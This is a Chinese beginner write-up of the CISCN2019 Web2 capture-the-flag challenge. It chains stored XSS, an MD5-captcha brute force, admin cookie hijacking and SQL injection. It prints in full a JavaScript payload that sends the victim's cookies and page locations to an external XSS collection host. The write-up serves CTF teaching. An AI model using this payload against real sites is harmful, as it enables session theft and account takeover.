[CISCN2019 华东北赛区]Web2 WriteUp

[CISCN2019 华东北赛区]Web2 WriteUp

  • 前言
  • 一.打开环境
  • 二.构造XSS代码

前言

这是一道xss结合sql注入的题目,当时在写的时候想了很久,最后看大佬的题解觉得不太适合我这样的新手来看,于是心血来潮想写一篇小白向的WriteUp。

一.打开环境

[CISCN2019 华东北赛区]Web2 WriteUp_第1张图片
[CISCN2019 华东北赛区]Web2 WriteUp_第2张图片
发现是一个网站,有投稿和反馈功能。这个比较重要。
我们很容易想到,可以投稿,然后点击审核,管理员就会来到我们的页面,审核我们的投稿
这样的话我们可以构造恶意代码,让管理员进去,从而窃取管理员的cookie,进入后台。
打开投稿和反馈界面,随意注册一下登录:
[CISCN2019 华东北赛区]Web2 WriteUp_第3张图片
[CISCN2019 华东北赛区]Web2 WriteUp_第4张图片
确定是xss。

二.构造XSS代码

构造所需要的xss代码并不需要我们自己去写。
只需要登录一下http://xss.buuoj.cn/
然后注册登录,创建一个项目就好:
[CISCN2019 华东北赛区]Web2 WriteUp_第5张图片
[CISCN2019 华东北赛区]Web2 WriteUp_第6张图片
自己可以研究一下那一摞代码都是干嘛的,我们这里并不需要明白。
复制以下代码
(function(){(new Image()).src=‘http://xss.buuoj.cn/index.php?do=api&id=T6A1kl&location=’+escape((function() {try{return document.location.href}catch(e){return ‘’}})())+’&toplocation=’+escape((function(){try{return top.location.href}catch(e){return ‘’}})())+’&cookie=’+escape((function(){try{return document.cookie}catch(e){return ‘’}})())+’&opener=’+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:’’}catch(e){return ‘’}})());})()
注意id一定要是你项目生成的id

然后把”(new Image()).src“改成“window.location.href”
再利用脚本:
[CISCN2019 华东北赛区]Web2 WriteUp_第7张图片
进行转码绕过保护。
复制payload_final,
传递到投稿界面。
[CISCN2019 华东北赛区]Web2 WriteUp_第8张图片
[CISCN2019 华东北赛区]Web2 WriteUp_第9张图片查看页面源代码

[CISCN2019 华东北赛区]Web2 WriteUp_第10张图片
复制如图的网址,打开反馈界面粘贴,在前面加上
http://web。
[CISCN2019 华东北赛区]Web2 WriteUp_第11张图片
接下来需要考虑验证码,这里涉及到哈希碰撞和生日攻击。简单来说就是暴力破解;脚本如图所示:
[CISCN2019 华东北赛区]Web2 WriteUp_第12张图片
在md5[0:6]后面加上你的页面所显示的6位字符
运行等待。
[CISCN2019 华东北赛区]Web2 WriteUp_第13张图片
填入。
[CISCN2019 华东北赛区]Web2 WriteUp_第14张图片接下来我们去自己创建的xss项目里看。
[CISCN2019 华东北赛区]Web2 WriteUp_第15张图片

[CISCN2019 华东北赛区]Web2 WriteUp_第16张图片

复制cookie,利用火狐的插件修改自己的cookie
很容易找到后台网址后面加上admin.php
[CISCN2019 华东北赛区]Web2 WriteUp_第17张图片没有管理cookie的情况下是这样的
[CISCN2019 华东北赛区]Web2 WriteUp_第18张图片

有了管理员权限后是这样的
好,我们已经成功进入后台,出现了一个查询框

[CISCN2019 华东北赛区]Web2 WriteUp_第19张图片

slq注入。

[CISCN2019 华东北赛区]Web2 WriteUp_第20张图片

结束。

你可能感兴趣的:(web)